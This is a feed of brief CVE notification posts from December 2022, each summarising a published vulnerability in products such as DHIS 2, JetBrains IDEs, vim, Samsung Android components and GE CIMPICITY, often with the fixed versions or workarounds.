🚨 CVE-2022-38765Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.🎖@cveNotify |
|
| 2022-12-09 02:49:27 |
🚨 CVE-2022-28958** DISPUTED ** D-Link DIR816L_FW206b01 was discovered to contain a remote code execution (RCE) vulnerability via the value parameter at shareport.php. NOTE: this has been disputed by a third party.🎖@cveNotify |
|
| 2022-12-09 02:49:23 |
🚨 CVE-2022-41948DHIS 2 is an open source information system for data capture, management, validation, analytics and visualization. Affected versions are subject to a privilege escalation vulnerability. A DHIS2 user with authority to manage users can assign superuser privileges to themself by manually crafting an HTTP PUT request. Only users with the following DHIS2 user role authorities can exploit this vulnerability. Note that in many systems the only users with user admin privileges are also superusers. In these cases, the escalation vulnerability does not exist. The vulnerability is only exploitable by attackers who can authenticate as users with the user admin authority. As this is usually a small and relatively trusted set of users, exploit vectors will often be limited. DHIS2 administrators should upgrade to the following hotfix releases: 2.36.12.1, 2.37.8.1, 2.38.2.1, 2.39.0.1. The only known workaround to this issue is to avoid the assignment of the user management authority to any users until the patch has been applied.🎖@cveNotify |
|
| 2022-12-09 02:49:22 |
🚨 CVE-2022-42799The issue was addressed with improved UI handling. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Visiting a malicious website may lead to user interface spoofing.🎖@cveNotify |
|
| 2022-12-09 02:49:21 |
🚨 CVE-2022-41260SAP Financial Consolidation - version 1010, does not sufficiently encode user-controlled input which may allow an unauthenticated attacker to inject a web script via a GET request. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2022-12-08 23:48:28 |
🚨 CVE-2022-41211Due to lack of proper memory management, when a victim opens manipulated file received from untrusted sources in SAP 3D Visual Enterprise Author and SAP 3D Visual Enterprise Viewer, Arbitrary Code Execution can be triggered when payload forces:Re-use of dangling pointer which refers to overwritten space in memory. The accessed memory must be filled with code to execute the attack. Therefore, repeated success is unlikely.Stack-based buffer overflow. Since the memory overwritten is random, based on access rights of the memory, repeated success is not assured.🎖@cveNotify |
|
| 2022-12-08 23:48:27 |
🚨 CVE-2022-42010An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message with certain invalid type signatures.🎖@cveNotify |
|
| 2022-12-08 23:48:26 |
🚨 CVE-2022-42011An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message where an array length is inconsistent with the size of the element type.🎖@cveNotify |
|
| 2022-12-08 23:48:25 |
🚨 CVE-2022-42012An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.🎖@cveNotify |
|
| 2022-12-08 23:48:21 |
🚨 CVE-2022-31188CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-12-08 23:48:20 |
🚨 CVE-2022-34749In mistune through 2.0.2, support of inline markup is implemented by using regular expressions that can involve a high amount of backtracking on certain edge cases. This behavior is commonly named catastrophic backtracking.🎖@cveNotify |
|
| 2022-12-08 23:48:19 |
🚨 CVE-2021-3979A key length flaw was found in Red Hat Ceph Storage. An attacker can exploit the fact that the key length is incorrectly passed in an encryption algorithm to create a non random key, which is weaker and can be exploited for loss of confidentiality and integrity on encrypted disks.🎖@cveNotify |
|
| 2022-12-08 23:48:15 |
🚨 CVE-2022-32429An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.🎖@cveNotify |
|
| 2022-12-08 23:48:14 |
🚨 CVE-2022-29221Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.🎖@cveNotify |
|
| 2022-12-08 23:48:13 |
🚨 CVE-2022-46158PrestaShop is an open-source e-commerce solution. Versions prior to 1.7.8.8 did not properly restrict host filesystem access for users. Users may have been able to view the contents of the upload directory without appropriate permissions. This issue has been addressed and users are advised to upgrade to version 1.7.8.8. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-12-08 23:48:12 |
🚨 CVE-2022-23469Traefik is an open source HTTP reverse proxy and load balancer. Versions prior to 2.9.6 are subject to a potential vulnerability in Traefik displaying the Authorization header in its debug logs. In certain cases, if the log level is set to DEBUG, credentials provided using the Authorization header are displayed in the debug logs. Attackers must have access to a users logging system in order for credentials to be stolen. This issue has been addressed in version 2.9.6. Users are advised to upgrade. Users unable to upgrade may set the log level to `INFO`, `WARN`, or `ERROR`.🎖@cveNotify |
|
| 2022-12-08 23:48:08 |
🚨 CVE-2022-23495go-merkledag implements the 'DAGService' interface and adds two ipld node types, Protobuf and Raw for the ipfs project. A `ProtoNode` may be modified in such a way as to cause various encode errors which will trigger a panic on common method calls that don't allow for error returns. A `ProtoNode` should only be able to encode to valid DAG-PB, attempting to encode invalid DAG-PB forms will result in an error from the codec. Manipulation of an existing (newly created or decoded) `ProtoNode` using the modifier methods did not account for certain states that would place the `ProtoNode` into an unencodeable form. Due to conformance with the [`github.com/ipfs/go-block-format#Block`](https://pkg.go.dev/github.com/ipfs/go-block-format#Block) and [`github.com/ipfs/go-ipld-format#Node`](https://pkg.go.dev/github.com/ipfs/go-ipld-format#Node) interfaces, certain methods, which internally require a re-encode if state has changed, will panic due to the inability to return an error. This issue has been addressed across a number of pull requests. Users are advised to upgrade to version 0.8.1 for a complete set of fixes. Users unable to upgrade may attempt to mitigate this issue by sanitising inputs when allowing user-input to set a new `CidBuilder` on a `ProtoNode` and by sanitising `Tsize` (`Link#Size`) values such that they are a reasonable byte-size for sub-DAGs where derived from user-input.🎖@cveNotify |
|
| 2022-12-08 23:48:07 |
🚨 CVE-2022-23496Yet Another UserAgent Analyzer (Yauaa) is a java library that tries to parse and analyze the useragent string and extract as many relevant attributes as possible. Applications using the Client Hints analysis feature introduced with 7.0.0 can crash because the Yauaa library throws an ArrayIndexOutOfBoundsException. If uncaught the exception will result in a program crash. Applications that do not use this feature are not affected. Users are advised to upgrade to version 7.9.0. Users unable to upgrade may catch and discard any ArrayIndexOutOfBoundsException thrown by the Yauaa library.🎖@cveNotify |
|
| 2022-12-08 23:48:06 |
🚨 CVE-2022-41949DHIS 2 is an open source information system for data capture, management, validation, analytics and visualization. In affected versions an authenticated DHIS2 user can craft a request to DHIS2 to instruct the server to make requests to external resources (like third party servers). This could allow an attacker, for example, to identify vulnerable services which might not be otherwise exposed to the public internet or to determine whether a specific file is present on the DHIS2 server. DHIS2 administrators should upgrade to the following hotfix releases: 2.36.12.1, 2.37.8.1, 2.38.2.1, 2.39.0.1. At this time, there is no known workaround or mitigation for this vulnerability.🎖@cveNotify |
|
| 2022-12-08 22:49:43 |
🚨 CVE-2022-1516A NULL pointer dereference flaw was found in the Linux kernel’s X.25 set of standardized network protocols functionality in the way a user terminates their session using a simulated Ethernet card and continued usage of this connection. This flaw allows a local user to crash the system.🎖@cveNotify |
|
| 2022-12-08 22:49:42 |
🚨 CVE-2022-1616Use after free in append_command in GitHub repository vim/vim prior to 8.2.4895. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution🎖@cveNotify |
|
| 2022-12-08 22:49:41 |
🚨 CVE-2022-40939In certain Secustation products the administrator account password can be read. This affects V2.5.5.3116-S50-SMA-B20171107A, V2.3.4.1301-M20-TSA-B20150617A, V2.5.5.3116-S50-RXA-B20180502A, V2.5.5.3116-S50-SMA-B20190723A, V2.5.5.3116-S50-SMB-B20161012A, V2.3.4.2103-S50-NTD-B20170508B, V2.5.5.3116-S50-SMB-B20160601A, V2.5.5.2601-S50-TSA-B20151229A, and V2.5.5.3116-S50-SMA-B20170217.🎖@cveNotify |
|
| 2022-12-08 22:49:37 |
🚨 CVE-2022-46827In JetBrains IntelliJ IDEA before 2022.3 an XXE attack leading to SSRF via requests to custom plugin repositories was possible.🎖@cveNotify |
|
| 2022-12-08 22:49:36 |
🚨 CVE-2022-46829In JetBrains JetBrains Gateway before 2022.3 a client could connect without a valid token if the host consented.🎖@cveNotify |
|
| 2022-12-08 22:49:32 |
🚨 CVE-2022-46831In JetBrains TeamCity between 2022.10 and 2022.10.1 connecting to AWS using the "Default Credential Provider Chain" allowed TeamCity project administrators to access AWS resources normally limited to TeamCity system administrators.🎖@cveNotify |
|
| 2022-12-08 22:49:31 |
🚨 CVE-2022-3134Use After Free in GitHub repository vim/vim prior to 9.0.0389.🎖@cveNotify |
|
| 2022-12-08 22:49:27 |
🚨 CVE-2022-2285Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.🎖@cveNotify |
|
| 2022-12-08 22:49:26 |
🚨 CVE-2022-41559The Web Client component of TIBCO Software Inc.'s TIBCO Nimbus contains an easily exploitable vulnerability that allows an unauthenticated attacker with network access to exploit an open redirect on the affected system. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.'s TIBCO Nimbus: version 10.5.0.🎖@cveNotify |
|
| 2022-12-08 22:49:25 |
🚨 CVE-2022-44153Rapid Software LLC Rapid SCADA 5.8.4 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2022-12-08 20:48:32 |
🚨 CVE-2022-43284** DISPUTED ** Nginx NJS v0.7.2 to v0.7.4 was discovered to contain a segmentation violation via njs_scope_valid_value at njs_scope.h. NOTE: the vendor disputes the significance of this report because NJS does not operate on untrusted input.🎖@cveNotify |
|
| 2022-12-08 20:48:31 |
🚨 CVE-2022-46154Kodexplorer is a chinese language web based file manager and browser based code editor. Versions prior to 4.50 did not prevent unauthenticated users from requesting arbitrary files from the host OS file system. As a result any files available to the host process may be accessed by arbitrary users. This issue has been addressed in version 4.50. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-12-08 20:48:30 |
🚨 CVE-2022-46826In JetBrains IntelliJ IDEA before 2022.3 the built-in web server allowed an arbitrary file to be read by exploiting a path traversal vulnerability.🎖@cveNotify |
|
| 2022-12-08 20:48:29 |
🚨 CVE-2022-46827In JetBrains IntelliJ IDEA before 2022.3 an XXE attack leading to SSRF via requests to custom plugin repositories was possible.🎖@cveNotify |
|
| 2022-12-08 20:48:26 |
🚨 CVE-2022-46828In JetBrains IntelliJ IDEA before 2022.3 a DYLIB injection on macOS was possible.🎖@cveNotify |
|
| 2022-12-08 20:48:25 |
🚨 CVE-2022-46830In JetBrains TeamCity between 2022.10 and 2022.10.1 a custom STS endpoint allowed internal port scanning.🎖@cveNotify |
|
| 2022-12-08 20:48:24 |
🚨 CVE-2022-46824In JetBrains IntelliJ IDEA before 2022.2.4 a buffer overflow in the fsnotifier daemon on macOS was possible.🎖@cveNotify |
|
| 2022-12-08 20:48:20 |
🚨 CVE-2022-41057Windows HTTP.sys Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2022-12-08 20:48:19 |
🚨 CVE-2022-46161pdfmake is an open source client/server side PDF printing in pure JavaScript. In versions up to and including 0.2.5 pdfmake contains an unsafe evaluation of user controlled input. Users of pdfmake are thus subject to arbitrary code execution in the context of the process running the pdfmake code. There are no known fixes for this issue. Users are advised to restrict access to trusted user input.🎖@cveNotify |
|
| 2022-12-08 20:48:18 |
🚨 CVE-2022-43285** DISPUTED ** Nginx NJS v0.7.4 was discovered to contain a segmentation violation in njs_promise_reaction_job. NOTE: the vendor disputes the significance of this report because NJS does not operate on untrusted input.🎖@cveNotify |
|
| 2022-12-08 20:48:17 |
🚨 CVE-2022-43363** DISPUTED ** Telegram Web 15.3.1 allows XSS via a certain payload derived from a Target Corporation website. NOTE: some third parties have been unable to discern any relationship between the Pastebin information and a possible XSS finding.🎖@cveNotify |
|
| 2022-12-08 20:48:14 |
🚨 CVE-2022-44289Thinkphp 5.1.41 and 5.0.24 has a code logic error which causes file upload getshell.🎖@cveNotify |
|
| 2022-12-08 20:48:13 |
🚨 CVE-2022-38599Teleport v3.2.2, Teleport v3.5.6-rc6, and Teleport v3.6.3-b2 was discovered to contain an information leak via the /user/get-role-list web interface.🎖@cveNotify |
|
| 2022-12-08 20:48:12 |
🚨 CVE-2022-46382RackN Digital Rebar through 4.6.14, 4.7 through 4.7.22, 4.8 through 4.8.5, 4.9 through 4.9.12, and 4.10 through 4.10.8 has Insecure Permissions. After signing into Digital Rebar, users are issued authentication tokens tied to their account to perform actions within Digital Rebar. During the validation process of these tokens, Digital Rebar did not check if the user account still exists. Deleted Digital Rebar users could still use their tokens to perform actions within Digital Rebar.🎖@cveNotify |
|
| 2022-12-08 17:47:43 |
🚨 CVE-2022-39906Improper access control vulnerability in SecTelephonyProvider prior to SMR Dec-2022 Release 1 allows attackers to access message information.🎖@cveNotify |
|
| 2022-12-08 17:47:42 |
🚨 CVE-2022-39894Improper access control vulnerability in ContactListStartActivityHelper in Phone prior to SMR Dec-2022 Release 1 allows to access sensitive information via implicit intent.🎖@cveNotify |
|
| 2022-12-08 17:47:41 |
🚨 CVE-2022-37916Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.🎖@cveNotify |
|
| 2022-12-08 17:47:40 |
🚨 CVE-2022-39909Insufficient verification of data authenticity vulnerability in Samsung Gear IconX PC Manager prior to version 2.1.221019.51 allows local attackers to create arbitrary file using symbolic link.🎖@cveNotify |
|
| 2022-12-08 17:47:37 |
🚨 CVE-2022-37918Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.🎖@cveNotify |
|
| 2022-12-08 17:47:36 |
🚨 CVE-2022-39912Improper handling of insufficient permissions vulnerability in setSecureFolderPolicy in PersonaManagerService prior to Android T(13) allows local attackers to set some setting value in Secure folder.🎖@cveNotify |
|
| 2022-12-08 17:47:35 |
🚨 CVE-2022-39897Exposure of Sensitive Information vulnerability in kernel prior to SMR Dec-2022 Release 1 allows attackers to access the kernel address information via log.🎖@cveNotify |
|
| 2022-12-08 17:47:34 |
🚨 CVE-2022-39899Improper authentication vulnerability in Samsung WindowManagerService prior to SMR Dec-2022 Release 1 allows attacker to send the input event using S Pen gesture.🎖@cveNotify |
|
| 2022-12-08 17:47:30 |
🚨 CVE-2022-39908TOCTOU vulnerability in Samsung decoding library for video thumbnails prior to SMR Dec-2022 Release 1 allows local attacker to perform Out-Of-Bounds Write.🎖@cveNotify |
|
| 2022-12-08 17:47:29 |
🚨 CVE-2022-3260The response header has not enabled X-FRAME-OPTIONS, Which helps prevents against Clickjacking attack.. Some browsers would interpret these results incorrectly, allowing clickjacking attacks.🎖@cveNotify |
|
| 2022-12-08 17:47:28 |
🚨 CVE-2022-39896Improper access control vulnerabilities in Contacts prior to SMR Dec-2022 Release 1 allows to access sensitive information via implicit intent.🎖@cveNotify |
|
| 2022-12-08 17:47:24 |
🚨 CVE-2022-39898Improper access control vulnerability in IIccPhoneBook prior to SMR Dec-2022 Release 1 allows attackers to access some information of usim.🎖@cveNotify |
|
| 2022-12-08 17:47:23 |
🚨 CVE-2022-41802Kernel subsystem within OpenHarmony-v3.1.4 and prior versions in kernel_liteos_a has a kernel stack overflow vulnerability when call SysClockGetres. 4 bytes padding data from kernel stack are copied to user space incorrectly and leaked.🎖@cveNotify |
|
| 2022-12-08 17:47:22 |
🚨 CVE-2022-44932An access control issue in Tenda A18 v15.13.07.09 allows unauthenticated attackers to access the Telnet service.🎖@cveNotify |
|
| 2022-12-08 16:47:31 |
🚨 CVE-2022-46792Hasura GraphQL Engine before 2.15.2 mishandles row-level authorization in the Update Many API for Postgres backends. The fixed versions are 2.10.2, 2.11.3, 2.12.1, 2.13.2, 2.14.1, and 2.15.2. (Versions before 2.10.0 are unaffected.)🎖@cveNotify |
|
| 2022-12-08 16:47:30 |
🚨 CVE-2020-36609A vulnerability was found in annyshow DuxCMS 2.1. It has been classified as problematic. This affects an unknown part of the file admin.php&r=article/AdminContent/edit of the component Article Handler. The manipulation of the argument content leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215115.🎖@cveNotify |
|
| 2022-12-08 16:47:29 |
🚨 CVE-2022-4348A vulnerability was found in y_project RuoYi-Cloud. It has been rated as problematic. Affected by this issue is some unknown functionality of the component JSON Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215108.🎖@cveNotify |
|
| 2022-12-08 16:47:25 |
🚨 CVE-2020-36610A vulnerability was found in annyshow DuxCMS 2.1. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215116.🎖@cveNotify |
|
| 2022-12-08 16:47:24 |
🚨 CVE-2022-4353A vulnerability has been found in LinZhaoguan pb-cms 2.0 and classified as problematic. Affected by this vulnerability is the function IpUtil.getIpAddr. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-215113 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-08 16:47:23 |
🚨 CVE-2022-4350A vulnerability, which was classified as problematic, was found in Mingsoft MCMS 5.2.8. Affected is an unknown function of the file search.do. The manipulation of the argument content_title leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215112.🎖@cveNotify |
|
| 2022-12-08 16:47:22 |
🚨 CVE-2022-4354A vulnerability was found in LinZhaoguan pb-cms 2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /blog/comment of the component Message Board. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-215114 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-08 14:47:37 |
🚨 CVE-2022-3690The Popup Maker WordPress plugin before 1.16.11 does not sanitise and escape some of its Popup options, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks, which could be used against admins🎖@cveNotify |
|
| 2022-12-08 11:47:59 |
🚨 CVE-2020-36609A vulnerability was found in annyshow DuxCMS 2.1. It has been classified as problematic. This affects an unknown part of the file admin.php&r=article/AdminContent/edit of the component Article Handler. The manipulation of the argument content leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215115.🎖@cveNotify |
|
| 2022-12-08 11:47:56 |
🚨 CVE-2020-36610A vulnerability was found in annyshow DuxCMS 2.1. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215116.🎖@cveNotify |
|
| 2022-12-08 11:47:54 |
🚨 CVE-2022-4353A vulnerability has been found in LinZhaoguan pb-cms 2.0 and classified as problematic. Affected by this vulnerability is the function IpUtil.getIpAddr. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-215113 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-08 11:47:52 |
🚨 CVE-2022-4350A vulnerability, which was classified as problematic, was found in Mingsoft MCMS 5.2.8. Affected is an unknown function of the file search.do. The manipulation of the argument content_title leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215112.🎖@cveNotify |
|
| 2022-12-08 11:47:50 |
🚨 CVE-2022-4354A vulnerability was found in LinZhaoguan pb-cms 2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /blog/comment of the component Message Board. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-215114 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-08 11:47:48 |
🚨 CVE-2022-4347A vulnerability was found in xiandafu beetl-bbs. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file WebUtils.java. The manipulation of the argument user leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215107.🎖@cveNotify |
|
| 2022-12-08 11:47:46 |
🚨 CVE-2022-4348A vulnerability was found in y_project RuoYi-Cloud. It has been rated as problematic. Affected by this issue is some unknown functionality of the component JSON Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215108.🎖@cveNotify |
|
| 2022-12-08 11:47:44 |
🚨 CVE-2022-4349A vulnerability classified as problematic has been found in CTF-hacker pwn. This affects an unknown part of the file delete.html. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-215109 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-08 11:47:42 |
🚨 CVE-2022-46792Hasura GraphQL Engine before 2.15.2 mishandles row-level authorization in the Update Many API for Postgres backends. The fixed versions are 2.10.2, 2.11.3, 2.12.1, 2.13.2, 2.14.1, and 2.15.2. (Versions before 2.10.0 are unaffected.)🎖@cveNotify |
|
| 2022-12-08 11:47:39 |
🚨 CVE-2022-46792Hasura GraphQL Engine before 2.15.2 mishandles row-level authorization in the Update Many API for Postgres backends. The fixed versions are 2.10.2, 2.11.3, 2.12.1, 2.13.2, 2.14.1, and 2.15.2. (Versions before 2.10.0 are unaffected.)🎖@cveNotify |
|
| 2022-12-08 06:47:37 |
🚨 CVE-2022-23476Nokogiri is an open source XML and HTML library for the Ruby programming language. Nokogiri `1.13.8` and `1.13.9` fail to check the return value from `xmlTextReaderExpand` in the method `Nokogiri::XML::Reader#attribute_hash`. This can lead to a null pointer exception when invalid markup is being parsed. For applications using `XML::Reader` to parse untrusted inputs, this may potentially be a vector for a denial of service attack. Users are advised to upgrade to Nokogiri `>= 1.13.10`. Users may be able to search their code for calls to either `XML::Reader#attributes` or `XML::Reader#attribute_hash` to determine if they are affected.🎖@cveNotify |
|
| 2022-12-08 01:47:50 |
🚨 CVE-2022-3084GE CIMPICITY versions 2022 and prior is vulnerable when data from a faulting address controls code flow starting at gmmiObj!CGmmiRootOptionTable, which could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2022-12-08 01:47:49 |
🚨 CVE-2022-3092GE CIMPICITY versions 2022 and prior is vulnerable to an out-of-bounds write, which could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2022-12-08 01:47:47 |
🚨 CVE-2022-4261Rapid7 Nexpose versions prior to 6.6.172 failed to reliably validate the authenticity of update contents. This failure could allow an attacker to provide a malicious update and alter the functionality of Rapid7 Nexpose. The attacker would need some pre-existing mechanism to provide a malicious update, either through a social engineering effort, privileged access to replace downloaded updates in transit, or by performing an Attacker-in-the-Middle attack on the update service itself.🎖@cveNotify |
|
| 2022-12-08 01:47:46 |
🚨 CVE-2022-4291The aswjsflt.dll library from Avast Antivirus windows contained a potentially exploitable heap corruption vulnerability that could enable an attacker to bypass the sandbox of the application it was loaded into, if applicable. This issue was fixed in version 18.0.1478 of the Script Shield Component.🎖@cveNotify |
|
| 2022-12-08 01:47:44 |
🚨 CVE-2022-3086Cradlepoint IBR600 NCOS versions 6.5.0.160bc2e and prior are vulnerable to shell escape, which enables local attackers with non-superuser credentials to gain full, unrestrictive shell access which may allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2022-12-08 01:47:43 |
🚨 CVE-2022-23471containerd is an open source container runtime. A bug was found in containerd's CRI implementation where a user can exhaust memory on the host. In the CRI stream server, a goroutine is launched to handle terminal resize events if a TTY is requested. If the user's process fails to launch due to, for example, a faulty command, the goroutine will be stuck waiting to send without a receiver, resulting in a memory leak. Kubernetes and crictl can both be configured to use containerd's CRI implementation and the stream server is used for handling container IO. This bug has been fixed in containerd 1.6.12 and 1.5.16. Users should update to these versions to resolve the issue. Users unable to upgrade should ensure that only trusted images and commands are used and that only trusted users have permissions to execute commands in running containers.🎖@cveNotify |
|
| 2022-12-08 01:47:41 |
🚨 CVE-2022-2002GE CIMPICITY versions 2022 and prior is vulnerable when data from faulting address controls code flow starting at gmmiObj!CGmmiOptionContainer, which could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2022-12-08 01:47:40 |
🚨 CVE-2022-2948GE CIMPICITY versions 2022 and prior is vulnerable to a heap-based buffer overflow, which could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2022-12-08 01:47:39 |
🚨 CVE-2022-2952GE CIMPICITY versions 2022 and prior is vulnerable when data from a faulting address controls code flow starting at gmmiObj!CGmmiOptionContainer, which could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2022-12-08 01:47:37 |
🚨 CVE-2022-23486libp2p-rust is the official rust language Implementation of the libp2p networking stack. In versions prior to 0.45.1 an attacker node can cause a victim node to allocate a large number of small memory chunks, which can ultimately lead to the victim’s process running out of memory and thus getting killed by its operating system. When executed continuously, this can lead to a denial of service attack, especially relevant on a larger scale when run against more than one node of a libp2p based network. Users are advised to upgrade to `libp2p` `v0.45.1` or above. Users unable to upgrade should reference the DoS Mitigation page for more information on how to incorporate mitigation strategies, monitor their application, and respond to attacks: https://docs.libp2p.io/reference/dos-mitigation/.🎖@cveNotify |
|
| 2022-12-08 01:47:36 |
🚨 CVE-2022-23487js-libp2p is the official javascript Implementation of libp2p networking stack. Versions older than `v0.38.0` of js-libp2p are vulnerable to targeted resource exhaustion attacks. These attacks target libp2p’s connection, stream, peer, and memory management. An attacker can cause the allocation of large amounts of memory, ultimately leading to the process getting killed by the host’s operating system. While a connection manager tasked with keeping the number of connections within manageable limits has been part of js-libp2p, this component was designed to handle the regular churn of peers, not a targeted resource exhaustion attack. Users are advised to update their js-libp2p dependency to `v0.38.0` or greater. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2022-12-08 01:47:35 |
🚨 CVE-2022-4341A vulnerability has been found in csliuwy coder-chain_gdut and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /back/index.php/user/User/?1. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215095.🎖@cveNotify |
|
| 2022-12-07 23:47:59 |
🚨 CVE-2022-40680A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3 allows a privileged attacker to execute unauthorized code or commands via storing malicious payloads in replacement messages.🎖@cveNotify |
|
| 2022-12-07 23:47:58 |
🚨 CVE-2021-3770vim is vulnerable to Heap-based Buffer Overflow🎖@cveNotify |
|
| 2022-12-07 23:47:57 |
🚨 CVE-2021-24431The Language Bar Flags WordPress plugin through 1.0.8 does not have any CSRF in place when saving its settings and did not sanitise or escape them when generating the flag bar in the frontend. This could allow attackers to make a logged in admin change the settings, and set Cross-Site Scripting payload in them, which will be executed in the frontend for all users🎖@cveNotify |
|
| 2022-12-07 23:47:56 |
🚨 CVE-2019-4514IBM Security Key Lifecycle Manager 2.6, 2.7, 3.0, and 3.0.1 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 165136.🎖@cveNotify |
|
| 2022-12-07 23:47:55 |
🚨 CVE-2019-4565IBM Security Key Lifecycle Manager 3.0 and 3.0.1 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 166626.🎖@cveNotify |
|
| 2022-12-07 23:47:51 |
🚨 CVE-2019-4477IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a user with access to audit logs to obtain sensitive information, caused by improper handling of command line options. IBM X-Force ID: 163997.🎖@cveNotify |
|
| 2022-12-07 23:47:50 |
🚨 CVE-2019-4494IBM Jazz Reporting Service (JRS) 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, and 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 164115.🎖@cveNotify |
|
| 2022-12-07 23:47:49 |
🚨 CVE-2019-4571IBM Content Navigator 3.0CD is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 166721.🎖@cveNotify |
|
| 2022-12-07 23:47:45 |
🚨 CVE-2019-4566IBM Security Key Lifecycle Manager 3.0 and 3.0.1 stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 166627.🎖@cveNotify |
|
| 2022-12-07 23:47:44 |
